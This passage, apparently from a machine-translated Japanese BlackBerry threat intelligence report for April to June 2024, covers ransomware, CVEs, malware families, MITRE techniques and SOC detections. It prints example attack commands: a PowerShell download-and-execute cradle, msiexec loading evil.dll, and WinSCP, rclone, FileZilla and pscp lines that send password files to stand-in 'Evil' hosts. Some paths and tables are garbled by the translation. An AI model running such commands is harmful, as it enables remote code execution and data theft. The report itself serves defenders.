リークされたのは最近だが、データ自体は数十年にわたるもので、このリークの影響を受けた被害者の何割かはすでに亡くなっている可能性があり、リークされたデータの一部は古い可能性が高い。また、1人の人物が多くの異なる記録を持つ可能性があり、それぞれがその人物に関連する過去の住所や名前に関連していることにも注意が必要だ。つまり、このリークによって影響を受けた人の数は、30億人が影響を受けた可能性があるという以前の誤ったメディアの主張よりもはるかに少ない可能性が高い。

しかし、PIIデータの膨大な量を考えると、米国で記録された過去最大級のデータ流出であり、米国を拠点とするすべての被害者が懸念すべきことである。この盗まれたデータは、この大失敗の影響が落ち着くまでの数ヶ月の間に、他の多くの脅威行為者によって活用され、武器化される可能性が高い。したがって、すべての国民が自分の信用情報に不正行為がないか積極的に監視し、発見された場合は信用情報機関に報告することが重要である。

サイバーストーリーハイライト新興ランサムウェアグループ - スペースベア

ランサムウェアのギャングが飽和状態にあるサイバー脅威の状況において、合法的な組織を標的にすることは、サイバー犯罪者にとって依然として有利です。新しいグループが出現したり、古いギャングからスピンオフしたりすることは頻繁にあり、多くの場合、新しい、または改良されたランサムウェアの系統や、過去の脅威行為者から試行錯誤され、テストされた手法を踏襲する手口で活動を開始します。

この報告期間に現れたそのようなグループのひとつが、巧妙で洗練されたリークサイトで知られるスペース・ベアーズである。研究者の中には、彼らがフォボスRaaSの運営者とつながりがあるのではないかと指摘する者もいる。

図12:スペースベアーズのリークサイト。
図12:スペースベアーズのリークサイト。(出典:https://socradar.io/dark-web-profile-spacebears/)

スペースベアとは?

今日のほとんどのランサムウェアギャングと同様、Space Bearsは二重の恐喝方法を採用しています。被害者のネットワークに侵入すると、まず機密データを流出させ、次に暗号化し、被害者に身代金の支払いを迫ります。身代金を支払わなければ、インターネット上にデータを公開すると脅すこともあります。

盗まれたデータへの言及は、ディープウェブの「.onion」アドレスにあるリークサイトに掲載されている。Torプロジェクトは通称「オニオン・ルーター」と呼ばれ、ユーザーのオンライン活動を匿名かつ安全に保つオープンソースのプライバシー・ツールである。被害者はこの流出サイトで名指しされ、恥をかかされる。指定された制限時間内に身代金を支払わない場合、データ公開までのカウントダウン・タイマーが表示される。4月中旬に活動を開始して以来、このグループはすでに世界のさまざまな業界で20人以上の被害者を標的にしている。

図13:スペースベアーズのリークサイト被害者ページ。
図13:スペースベアーズのリークサイト被害者ページ。

スペース・ベアーのターゲット産業とジオロケーション

スペースベアーズの被害者は、世界中の多種多様な業種に及んでいる。ターゲットとなる業界や世界各地の範囲が広いのは、意図的なものかもしれない。例えば、このグループは法執行機関のレーダーの下を潜り抜け、防衛側が彼らを見つけにくくしようとしているのかもしれません。このため、このような犯罪を捜査し、脅威グループをシャットダウンするためには、通常、国際的な協力が必要となる。脅威行為者の活動は世界各地に広がっているため、各国政府や法執行機関が対応し、情報を共有するには時間がかかる。これは残念ながら、ランサムウェアグループが計画を立て、回避し、再編成する機会を増やすことになる。
図14:脅威グループ「Space Bears」が標的とする産業。
図15:スペースベアーズのこれまでの被害地。

一般的な脆弱性と暴露

CVEs(Common Vulnerabilities and Exposures)は、既知のセキュリティ脆弱性と暴露を特定し、標準化し、公表するための枠組みです。4月から2024年6月までに、ほぼ12,011件の新しいCVEが米国国立標準技術研究所(NIST)によって報告された。これは、2024年1月から3月までの同様の期間に比べ、開示された脆弱性が35%近く増加したことになる。

5月に新たに発見されたCVEは5,103件に達し、今年第1四半期に記録された数字をすべて更新した。これらには以下が含まれる:
 

パロアルト PAN-OS RCE

CVE-2024-3400(10.0 Critical) 任意のコード実行
パロアルト社によると、この問題は、GlobalProtect ゲートウェイまたは GlobalProtect ポータルで構成された PAN-OS 10.2、PAN-OS 11.0、および PAN-OS 11.1 ファイアウォールに該当します。この CVE は、Palo Alto Networks PAN-OS ソフトウェアの GlobalProtect 機能における任意のファイル作成の脆弱性に起因するコマンドインジェクションに関するものです。この脆弱性により、認証されていない攻撃者がファイアウォールの root 権限で任意のコードを実行できる可能性があります。この可能性を考慮し、CVE には最高のクリティカルスコアが与えられました。
 

PyTorchフレームワークにRCEの脆弱性

CVE-2024-5480(10.0 Critical) 任意コード実行
PyTorch の 'torch.distributed.rpc' フレームワーク、特に 2.2.2 より前のバージョンに脆弱性があり、 リモートでコードを実行 (RCE) される可能性があります。この脆弱性により、攻撃者は組み込みの Python 関数を利用して任意のコマンドを実行することができます。

 

量子ゲートウェイ情報公開

CVE-2024-24919(8.6 High) 認証バイパス
VPN のような境界ネットワーク・デバイスは、ハッカーや先進国のスポンサーにとって格好の標的です。Check Point™ は、2024年5月28日にゼロデイ・アドバイザリを公開し、同社のセキュリティ・ゲートウェイに存在する脆弱性によって、攻撃者が機密情報にアクセスしたり、ドメイン権限を取得したりする可能性があることを警告しています。この脆弱性により、ハッカーは横方向に移動し、さらなるネットワーク特権を獲得することが可能になります。チェック・ポイントは声明の中で、この欠陥の影響を受ける可能性のあるデバイスは数千台に上り、 不正アクセスが多数試みられていると指摘しています

図16:CVE得点(2024年4月から6月)。

プラットフォーム別の脅威Windows

インフォシーラー

Lumma Stealerは、暗号通貨ウォレットのデータや2要素認証(2FA)ブラウザ拡張機能のデータなど、被害者のデバイスからプライベートかつセンシティブなデータを抜き取ることに特化したCベースの情報窃取ツールです。

ダウンローダー

GuLoader(別名CloudEyE)は、Visual Basic 5または6でラッピングされた暗号化されたシェルコードで、さまざまなタイプの追加ペイロードをダウンロードします。

インフォシーラー

Agent Teslaは.NETベースのトロイの木馬で、MaaSとして販売されることが多く、主にクレデンシャル・ハーベスティングに使用される。

インフォシーラー

RiseProは、被害者のデバイスにアクセスし、機密データを収集してC2サーバーに送り返すために、多くの配布方法を使用する。

インフォシーラー

RedLine Stealerは、幅広いアプリケーションやサービスを使用して、パスワード、クッキー、クレジットカード情報などの被害者情報を収集します。

リモートアクセス型トロイの木馬

Remcosは、リモートコントロールと監視の略で、被害者のデバイスにリモートアクセスするために使用されるアプリケーションです。

リモートアクセス型トロイの木馬

DCRatは、被害者の情報を盗み出し、C2サーバーからコマンドを実行するリモートアクセス型トロイの木馬です。DCRatはSignal経由で配布されていることが確認されています。

ボットネット

アマデイは、被害者の情報を収集し、C2サーバーからのコマンドを待って追加のペイロードをダウンロードするボットネットである。

プラットフォーム別の脅威Linux

トロイの木馬

トロイの木馬 XorDDos は、今報告期間中、遠隔測定においてその流行を維持しています。XorDDos は、通信および実行データへのアクセスを制御するために XOR 暗号化を使用して、Linux ベースのデバイスに感染し、C2 命令を介して単一のボットネットとしてそれらを制御します。

バックドア

BPFDoorは、Berkeley Packet Filter (BPF)スニッファを利用してネットワーク・トラフィックを傍受し、変更するLinuxバックドアです。BPFDoorはファイアウォールを迂回し、検知されずに残ることができるため、脅威行為者グループRed Menshenによって受動的な監視ツールとして使用されてきました。BPFDoorの新しい亜種はリバースシェル通信を採用し、暗号化を強化しています。

ボットネット

Miraiは、認証バイパスの欠陥を利用してエンドポイントにアクセスし、コマンドインジェクションの脆弱性を利用してボットネットを配信・展開し、脆弱なデバイスを乗っ取ることが検出されている。

ボットネット

Gafgytとしても知られるBashliteもLinuxボットネットで、C2サーバーを使って感染したデバイスに実行させる指示を送る。このボットネットは、ルーターなどのモノのインターネット(IoT)デバイスを標的にしており、標的に対する大規模なDDoS攻撃を調整するために使用していることが記録されている。

コインマイナー

XMRigは、その高い性能とオープンソースの性質により、Moneroなどの暗号通貨をマイニングするためのツールとして人気があります。XMRigは、システムに対する最初のアクセスを獲得すると、脅威行為者によって展開され、被害者が知らないうちに暗号を採掘するために使用されることがよくあります。

プラットフォーム別にみた一般的な脅威:macOS

泥棒

4月にKandjiの脅威リサーチチームによって発見され、命名されたCuckoo Stealerは、スパイウェアと情報窃取機能を含む悪意のあるディスクイメージ(DMG)ファイルとして配布されます。Cuckoo Stealerが発見されて以来、このマルウェアの新しいサンプルが急激に増加しています。

泥棒

Atomic Stealer(別名AMOS)は依然として流行しており、新たな亜種が多数発見されている。新たな亜種は、ディスクイメージ経由で配布される様々なアプリを装っている。AMOSは、パスワード、ブラウザクッキー、オートフィルデータ、暗号ウォレット、Macキーチェーンデータを狙う窃盗犯です。

バックドア

Python Package Index(PyPI)を利用した悪意のある攻撃が研究者によって発見された。このマルウェアは、PyPIライブラリを利用してターゲットマシンにSliver C2ペイロードをインストールします。このパッケージはGoプログラミング言語で書かれており、攻撃を実行するためにPortable Networks Graphic(PNG)ファイル内のステガノグラフィーを使用しています。

泥棒

このマルウェアは、Arcウェブブラウザ用の悪質なGoogle広告を利用することで拡散します。これらの広告は被害者を騙して悪意のあるDMGインストーラーファイルをダウンロードさせ、感染プロセスを開始させ、マルウェアをマシンに落とします。Poseidonには、ユーザー認証情報、VPN設定、暗号通貨ウォレットを採取する機能があります。

プラットフォーム別の脅威アンドロイド

インフォシーラー

この情報窃取ツールは、Androidアクセシビリティサービスを利用してユーザーデータをキャプチャし、キャプチャしたデータをC2サーバーに送信します。SpyNoteには、クリック/ロングクリック、スクリーンショットの撮影、被害者の画面のロックなどの機能が含まれています。

バックドア/ランサムウェア

Rafel RATは、トロイの木馬アプリケーションとして、またはフィッシングキャンペーンを通じて配布されます。その機能には、C2、位置追跡、デバイス通知のリダイレクト、ターゲットデバイスからの個人的なSMSメッセージや通話ログの抽出などが含まれます。

インフォシーラー

SoumniBot はバンキング・キーを盗み、被害者の銀行口座を略奪します。このマルウェアは、Androidマニフェスト内の検証の問題を悪用し、リモートサーバーにアップロードする情報を盗み出します。

インフォシーラー

Vulturは、トロイの木馬アプリケーションや「smishing(SMSフィッシング)」と呼ばれるソーシャルエンジニアリングの手法を通じて配布されています。データの流出に加え、脅威者はVulturを使用してファイルシステムに変更を加え、実行権限を変更し、Android Accessibility Servicesを使用して感染したデバイスを制御することができます。

MITREの共通テクニック

脅威グループのハイレベルなテクニックを理解することは、どの検知テクニックを優先すべきかを決定する際に役立ちます。BlackBerry 、本レポート期間中に脅威アクターが使用したテクニックのトップ20は以下のとおりです。
 

検出されたテクニック

以下の表は、上位20のテクニックを示している。変化」欄の上向き矢印(↑)は、前回のレポートから そのテクニックの使用率が上昇 したことを示す。下向き矢印(↓)は、 前回のレポートから使用率が 減少したことを 示す。イコール(=)の記号は、そのテクニックが前回のレポートと同じ位置にあることを意味する。

技術名 テクニックID 戦術名 最終レポート 変更
ハイジャック実行フロー
T1574
永続性、特権のエスカレーション、防御回避
NA
DLLサイドローディング
T1574.002
永続性、特権のエスカレーション、防御回避
3
プロセス・インジェクション
T1055
特権のエスカレーション、防御回避
1
入力キャプチャ
T1056
クレデンシャル・アクセス、コレクション
4
=
システム情報の発見
T1082
ディスカバリー
2
ソフトウェア・ディスカバリー
T1518
ディスカバリー
NA
セキュリティ・ソフトウェアの発見
T1518.001
ディスカバリー
5
プロセス・ディスカバリー
T1057
ディスカバリー
8
ファイルとディレクトリの検出
T1083
ディスカバリー
7
マスカレード
T1036
防御回避
6
アプリケーション層プロトコル
T1071
コマンド&コントロール
9
非アプリケーション層プロトコル
T1095
コマンド&コントロール
11
リモート・システム・ディスカバリー
T1018
ディスカバリー
12
ブートまたはログオンの自動開始実行
T1547
永続性、特権のエスカレーション
NA
レジストリの実行キー / スタートアップフォルダ
T1547.001
永続性、特権のエスカレーション
10
アプリケーション・ウィンドウの発見
T1010
ディスカバリー
13
インペア・ディフェンス
T1562
防御回避
NA
ツールの無効化または変更
T1562.001
防御回避
17
スケジュールされたタスク/ジョブ
T1053
実行、永続性、特権の昇格
15
現地システムからのデータ
T1005
コレクション
NA
テクニックID
ハイジャック実行フロー
T1574
DLLサイドローディング
T1574.002
プロセス・インジェクション
T1055
入力キャプチャ
T1056
システム情報の発見
T1082
ソフトウェア・ディスカバリー
T1518
セキュリティ・ソフトウェアの発見
T1518.001
プロセス・ディスカバリー
T1057
ファイルとディレクトリの検出
T1083
マスカレード
T1036
アプリケーション層プロトコル
T1071
非アプリケーション層プロトコル
T1095
リモート・システム・ディスカバリー
T1018
ブートまたはログオンの自動開始実行
T1547
レジストリの実行キー / スタートアップフォルダ
T1547.001
アプリケーション・ウィンドウの発見
T1010
インペア・ディフェンス
T1562
ツールの無効化または変更
T1562.001
スケジュールされたタスク/ジョブ
T1053
現地システムからのデータ
T1005
戦術名
ハイジャック実行フロー
永続性、特権のエスカレーション、防御回避
DLLサイドローディング
永続性、特権のエスカレーション、防御回避
プロセス・インジェクション
特権のエスカレーション、防御回避
入力キャプチャ
クレデンシャル・アクセス、コレクション
システム情報の発見
ディスカバリー
ソフトウェア・ディスカバリー
ディスカバリー
セキュリティ・ソフトウェアの発見
ディスカバリー
プロセス・ディスカバリー
ディスカバリー
ファイルとディレクトリの検出
ディスカバリー
マスカレード
防御回避
アプリケーション層プロトコル
コマンド&コントロール
非アプリケーション層プロトコル
コマンド&コントロール
リモート・システム・ディスカバリー
ディスカバリー
ブートまたはログオンの自動開始実行
永続性、特権のエスカレーション
レジストリの実行キー / スタートアップフォルダ
永続性、特権のエスカレーション
アプリケーション・ウィンドウの発見
ディスカバリー
インペア・ディフェンス
防御回避
ツールの無効化または変更
防御回避
スケジュールされたタスク/ジョブ
実行、永続性、特権の昇格
現地システムからのデータ
コレクション
最終レポート
ハイジャック実行フロー
NA
DLLサイドローディング
3
プロセス・インジェクション
1
入力キャプチャ
4
システム情報の発見
2
ソフトウェア・ディスカバリー
NA
セキュリティ・ソフトウェアの発見
5
プロセス・ディスカバリー
8
ファイルとディレクトリの検出
7
マスカレード
6
アプリケーション層プロトコル
9
非アプリケーション層プロトコル
11
リモート・システム・ディスカバリー
12
ブートまたはログオンの自動開始実行
NA
レジストリの実行キー / スタートアップフォルダ
10
アプリケーション・ウィンドウの発見
13
インペア・ディフェンス
NA
ツールの無効化または変更
17
スケジュールされたタスク/ジョブ
15
現地システムからのデータ
NA
変更
ハイジャック実行フロー
DLLサイドローディング
プロセス・インジェクション
入力キャプチャ
=
システム情報の発見
ソフトウェア・ディスカバリー
セキュリティ・ソフトウェアの発見
プロセス・ディスカバリー
ファイルとディレクトリの検出
マスカレード
アプリケーション層プロトコル
非アプリケーション層プロトコル
リモート・システム・ディスカバリー
ブートまたはログオンの自動開始実行
レジストリの実行キー / スタートアップフォルダ
アプリケーション・ウィンドウの発見
インペア・ディフェンス
ツールの無効化または変更
スケジュールされたタスク/ジョブ
現地システムからのデータ

MITRED3FEND™使用して、BlackBerry Threat Research and Intelligence Team はこの報告期間中に観測されたテクニックに対する完全な対策リストを作成し、GitHub で公開しています。攻撃者は、攻撃を成功させるための重要な情報を収集するために、最もよく知られている上位 3 つのテクニックを使用します。適用された対策のセクションでは、その使用例と監視に役立つ情報について説明します。テクニックと戦術の合計のインパクト評価は、この図で見ることができます。

図 17:MITRE ATT&CK テクニックの観測値(2024 年 4 月~6 月)。

検出された戦術

この報告期間では、同じ割合で観察された2つの戦術がある。特権のエスカレーションと 防御回避で23%、次いでディスカバリーで19%である。これらは前期の上位戦術と同じである。

図18:観察されたMITRE ATT&CKの戦術(2024年4月から6月)。

CylanceMDR データ

このセクションでは、本レポートの報告期間中に脅威の標的となった顧客環境で観測された脅威のうち、特に興味深い検出事例を紹介します。 CylanceMDR本レポートでは、この報告期間中に脅威の標的となった顧客環境で観測された脅威のうち、特に興味深いものを取り上げています。

CylanceMDR は、24時間365日の監視を提供するサブスクリプション・ベースのマネージド検知・対応(MDR)サービスです。このサービスは、顧客のセキュリティ・プログラムのギャップを探る高度なサイバー脅威の阻止を支援します。BlackBerry MDRチームは、この報告期間中に何千ものアラートを追跡しました。以下では、現在の脅威の状況についてさらなる洞察を提供するために、遠隔測定結果を地域ごとに分類しています。

図19:地域別CylanceMDR 警告トップ5。

CylanceMDR 観察

今回の報告期間中、前回の報告書と同様に、CylanceMDR チームは、Certutil が全地域のセキュリ ティ・オペレーション・センター(SOC)の大規模な検出源であり続けていることを確認した。

北米/中南米(NALA)および欧州・中東・アフリカ(EMEA)地域では、「PowerShell Download」の検出に関連する活動の傾向も見られました。たとえば、powershell.exe -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString('hxxps://SourceofEvil/test[.]ps1')) のようなPowerShell経由のダウンロードクレードルを使用して、MITREのテクニックIngress Tool Transfer (T1105) を達成しようとする敵が見られました。

さらに、前回のレポートではあまり見られなかったBase64エンコーディングの検出数の増加も確認されました。Base64エンコーディングは、脅威行為者がコードを難読化する比較的簡単な方法を提供し、悪意のあるコードを偽装して検出しにくくする可能性があります。しかし、ほとんどの熟練したアナリストは、脅威行為者がBase64を使用していることをよく知っているため、この回避テクニックを特定するために、通常、より成熟したSOCには特別な警戒と検出機能が組み込まれています。

NALA および APAC 地域で特に興味深いのは、この報告期間中に「DLL ロードによる Msiexec の悪用の可能性」に関連するいくつかの検出が確認され始めたことです。Msiexecは、Windowsのコマンドラインユーティリティであり、一般的に.msiインストールパッケージの実行に関連しています。私たちのシステムは、悪意のある DLL ペイロード(MITRE テクニック T1218.007)をプロキシ実行するために Msiexec を悪用しようとする脅威者を検出しています。検出されたコマンドの例は次のとおりです: 'C:⊖windowssystem32⊖msiexec.exe /Z c:⊖programdata⊖evil.dll'。

LOLBAS 活動

この報告期間中、私たちは以下のリビング・オフ・ザ・ランドのバイナリ、スクリプト、ライブラリ(LOLBAS)の活動を観測した:

  • Bitsadminは引き続きLOLBASの最高観測値である。
  • Certutilは僅差の2位で、前回の報告期間から増加している。
  • Regsvr32、MSHTA、MOFCOMPはまだ観測されているが、全体としては低い割合である。
図20:LOLBASの活動(2024年4月から6月)。

流出ツール

前回のレポートでは、リモート監視・管理(RMM)ツールと、それらが脅威行為者によってどのように悪用されることが多いかを説明した。RMMツールは、攻撃者が永続性とアクセスのしやすさを維持するための簡単な方法を提供し、また顧客環境からデータを簡単に流出させる方法を提供します。実際、研究者は、RMMツールがランサムウェアグループが被害者の環境からデータを流出させるために最も急速に成長しているカテゴリであると報告しています。

この報告期間中に、CylanceMDR は、顧客環境において流出に使用される可能性のある最も一般的なツール(RMM ツールを除く)をレビューした。

図 21:CylanceMDR によって検出された侵入ツール。

ツール

ウィンエスシーピー

説明 WinSCPはファイル転送クライアント、PuTTYはセキュアシェル(SSH)クライアントです。

コマンドライン例:winscp.exe scp://test:P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto

注: グラフィカル・ユーザー・インターフェース(GUI)でよく使用される。

ミターアタックIDT1048

Rクローン

説明Rcloneは、クラウドストレージ上のコンテンツを管理するために使用されるコマンドラインユーティリティです。

コマンドライン例:rclone.exe copy "\SERVER↩passwords ftp:EvilCorp↩files" -q --transfers 10

ミッターアタックIDS1040

ファイルジラ

説明FileZillaは、様々なオペレーティングシステムで使用できる有名なファイル転送プロトコル(FTP)ツールです。

コマンドライン例:filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /remote_directory/pass.txt"

ミターアタックIDT1071.002

PSCP

説明PuTTY Secure Copy Protocol (PSCP) は、ファイルとフォルダの転送に使用されるコマンドラインユーティリティです。

コマンドライン例:pscp.exe -P 22 C:♪Finances.txt root[at]EvilDomain/tmp

ミターアタックIDT1021.004

フリーファイルシンク

説明FreeFileSyncはバックアップを管理するための同期ツールです。

コマンドラインの例FreeFileSync.exe google_drive_sync.ffs_batch

Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />

ミターアタックIDT1567.002

要点

流出目的で使用されるツールには多くのバリエーションがあるため、上記のツールのリストは網羅的なものではない。したがって、悪意のある目的に使用される可能性のあるツールの使用から防御する戦略を組織が持つことが重要である。

これらの戦略には以下のようなものがある:

  • 情報漏えいによる機密データの紛失、誤用、共有、不正使用や流出を検知・防止するためのデータ損失防止(DLP)ツール。
  • 静止時と転送時の暗号化。
  • アクセス制御。
  • 「最小権限」設定。必要なものだけにアクセスできるようにする。
  • 定期的なアカウントの監査 - 例えば、ユーザーが役割を変更した場合、そのユーザーはもはや必要のないデータにアクセスできる可能性がある。
  • ネットワーク・セグメンテーション:侵入された場合、明確に定義されたネットワーク・セグメントは、横方向の動きを妨げ、攻撃対象範囲を狭める。
  • ネットワークトラフィックを監視する侵入検知システム。
  • デフォルト拒否アプローチを適用 - 必要な場合のみ有効にする。例えば
    • USBポートやクラウドストレージサービスの使用をブロックする。(例:グループポリシーオブジェクト(GPO)を使用して、USBポートでのデータ転送を無効にする)
    • ポートをインターネットに公開すべきではない(例:ポート22(SSH)をインターネットに公開すべきではない)。
    • ポート、プロトコル、サービスの使用を制限することで、全体的なリスクを低減します。
  • 以下のようなアウトバウンドのトラフィックパターンを監視する:
    • 通常の営業時間外における交通量の増加(通常の基準値からの逸脱)。
    • ポート22を経由するアウトバウンド・トラフィックが突然増加した場合、pscp.exeのようなツールを使用した流出の可能性がある。
      • 前述したように、22のようなポートは、このようなリスクを防ぐために、デフォルト拒否のアプローチを適用すべきである。
  • 無効化されたポートやサービスに対するアウトバウンドの試みを監視するためのコントロールを設置する。
    • 例えば、脅威行為者がネットワークにアクセスし、これらのポートやサービスを使用可能にしようとした場合、このようなコントロールはセキュリティ・チームに警告を発する。         

SOCアナリストの視点から、アナリストが注意すべき例をいくつか挙げてみよう:

ツール名の変更

アナリストは、一般的に使用される流出ツールとそのオプションおよびパラメータを認識しておく必要があります。Rcloneの例である「rclone.exe copy "\SERVERpasswords\ ftp:EvilCorpfiles" -q --transfers 10」を使って、脅威行為者はこれを「svchost.exe copy "\SERVERpasswords\ ftp:EvilCorpfiles" -q --transfers 10」のようなもっと無害なものにリネームするかもしれない。

データ転送量

大規模なデータ転送があったり、アウトバウンドのトラフィックが突然増加したりした場合、アナリストは調査する必要があります。

異常なトラフィック

不明なIPやホストからの予期せぬデータ転送パターンに注意。

ユーザー行動分析

通常アクセスする必要のないファイルにユーザーがアクセスするなど、通常から逸脱したパターンを監視する。例えば、マーケティング・チーム・メンバーのホストが顧客の財務記録にアクセスするような場合です。

結論と見通し

2024年4月から6月までの90日間をカバーするこのレポートは、将来の脅威に関する情報を入手し、それに備えるためのものです。著名な犯罪グループ、特にランサムウェアの運営者は、新たな脆弱性を悪用し、大小のターゲットに価値を見出しています。同レポートで述べられているように、BlackBerry のリサーチャーは、毎日平均11,500以上のユニークなマルウェアのハッシュが捕捉されていることを観測しています。このようなレベルの活動により、業界や地域の最新のセキュリティ・ニュースを常に把握することが極めて重要になっています。

サイバー脅威の現状を踏まえ、我々は今後数ヶ月の脅威を以下のように予測している:

選挙妨害
世界人口の約60%が投票すると予想される2024年は、世界的に選挙にとって重要な年である。
ディープフェイクという比較的新しいメディアを通じた脅威を含め、誤報、偽情報、干渉の試みは、すでに年間を通じて観察されている。悪意ある行為者は、混乱をまき散らし、社会的分裂を煽り、混乱を引き起こすために、この瞬間を捉えようとしている。選挙が近づくにつれ、フェイクニュースや誤報を拡散するキャンペーンは激化し、その努力はエスカレートしていくと予測される。

政治色を帯びたフィッシング・ルアー
マルウェアを拡散させるために、政治的傾向の強い投稿、フォーラム、メーリングリストを悪用することは、近い将来、兵器化された戦術となる可能性がある。様々な政界からの極論を利用することで、脅威者はこの混乱を悪用し、トロイの木馬に感染した政治的な資料を配布し、さらに多くのマルウェアを展開する可能性があります。一般的な戦術には、偽情報をまき散らすソーシャルメディアへの投稿を作成し、ソーシャルメディア・プラットフォーム、インスタント・メッセンジャー、および従来のニュース・メディアで何百万ものクリック数、閲覧数、エンゲージメントを生成することが含まれます。脅威の多くは、このようなソーシャルメディア上の活動を、マルウェア攻撃を行うためのおとりとして利用する可能性があります。

カオスの兵器化
サイバーセキュリティの領域では、どのような種類の混乱も、悪意のある行為者が混乱や誤った情報を悪用するための肥沃な土壌となる。戦争、自然災害、IT の停止など、通常の通信やデータの流れが大きく阻害されるような不安定な状況は、サイバー犯罪者にとって絶好の機会となります。脅威行為者は、偽のフィッシングメール、誤解を招くようなフォーラムへの投稿、有益で文脈に関連したツールを装った悪意のあるソフトウェアを広めることで、このような状況を継続的に活用する態勢を整えている。

ランサムウェアの進化とAI
世界中の法執行機関、法律家、セキュリティ専門家による監視の強化に直面しているランサムウェアの
脅威当事者は、その活動を継続するために戦術、技術、手順(TTP)を進化させる可能性が高い

この進化には、AI(特にジェネレイティブAI)を活用して、より高度で装甲化されたペイロードや実行チェーンを開発すること、高度で標的を絞ったソーシャル・エンジニアリング攻撃にディープフェイク技術を活用すること、追跡やシャットダウンを回避するためにネットワークやC2インフラを分散化・匿名化すること、運用上のセキュリティを向上させることなどが含まれる。

サイバーセキュリティの脅威と防御の流動的な状況について最新情報を得るには、BlackBerry ブログをご覧ください。

免責事項

BlackBerry Global Threat Intelligence Report に含まれる情報は、情報提供のみを目的としています。ブラックベリーは、本レポートで言及されている第三者の声明や調査の正確性、完全性、信頼性について保証するものではなく、責任を負うものでもありません。本レポートに記載された分析は、当社のリサーチアナリストによる入手可能な情報の現在の理解を反映したものであり、追加情報が当社 に知らされた場合には変更される可能性があります。読者は、本情報を私生活および職業生活に適用する際には、各自で十分な注意を払う責任があります。BlackBerry は、本レポートに掲載された情報の悪意ある使用または誤用を容認するものではありません。